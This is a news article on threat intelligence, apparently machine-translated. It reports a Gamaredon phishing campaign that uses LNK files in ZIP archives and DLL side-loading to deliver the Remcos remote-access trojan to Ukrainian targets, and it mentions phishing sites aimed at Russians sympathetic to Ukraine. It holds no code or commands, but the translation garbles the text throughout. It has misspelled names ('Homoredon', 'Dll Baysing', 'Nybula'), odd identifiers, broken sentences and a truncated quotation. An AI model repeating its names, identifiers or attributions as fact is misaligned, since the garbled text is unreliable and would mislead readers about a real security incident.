Subjects in Ukraine were aimed at a phishing campaign aimed at distributing Trojan remote Rat Remecos.
“File names use Russian words related to troops in Ukraine as a bait,” Cisco Talos Guilherme Venere researcher – Note In a report published last week. “Loading PowerShell is in contact with geo-aggregated servers located in Russia and Germany to download the mail file in the second stage containing Backdoor Remcos.”
Activities has been associated with moderate confidence for a Russian hacking group known as HomoredonAlso tracked under Monikers Aqua Blizzard, Armageddon, Blue Otso, Bluealpha, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-20010, UAC530 and Winterflounder.
The actor of the threat, which is estimated with the Russian Federal Security Service (FSB), is known for his orientation to Ukrainian organizations for espionage and theft of data. It has been operating at least since 2013.
The latest company is characterized by the distribution of Windows Shortcut files (LNK), compressed inside the ZIP archives, masking them into Microsoft Office documents related to the current Russo-Sukrainian war to cheat the recipients. It is believed that these archives are sent through phishing.
Gamaredon links follow from the use of two machines used when making malicious label files and which were previously used by threatening the actor for such purposes.
The LNK files are shipped with the PowerShell code, which is responsible for downloading and executing the next useful CMDlet Get-Command load, as well as receiving the bait file that is displayed to keep the blow.
The second stage is another ZIP archive, which contains malicious DLL, which will be made using the technique called Dll Baysing. Dll is a loader that transcripts and launches the final useful load of Remcos from encrypted files present in the archive.
The disclosure of information occurs as a silent impetus in detail about a phishing campaign that uses bait sites to collect information against Russian persons who sympathize with Ukraine. It is assumed that the activity is the work of either the Russian special service or the actor of the threat agreed with Russia.
The company consists of four major phishing clusters representing itself for the Central Intelligence Agency (CIA), the Russian volunteer corps, the legion of Liberty and wanting “I want to live” and “a” a ” hotline For receiving appeals from members of the Russian service in Ukraine to give themselves to the Ukrainian armed forces.
It was found that the phishing pages are placed on the Nybula LLC hosting -piercing supplier, and the threat subjects are based on Google forms and e -mails to collect personal information, including their political views, bad habits and fitness, from the victims.
“All companies (…) observed – Note. “These phishing -anipotes are probably the work of either the Russian special service or the actor of the threat agreed with the Russian interests.”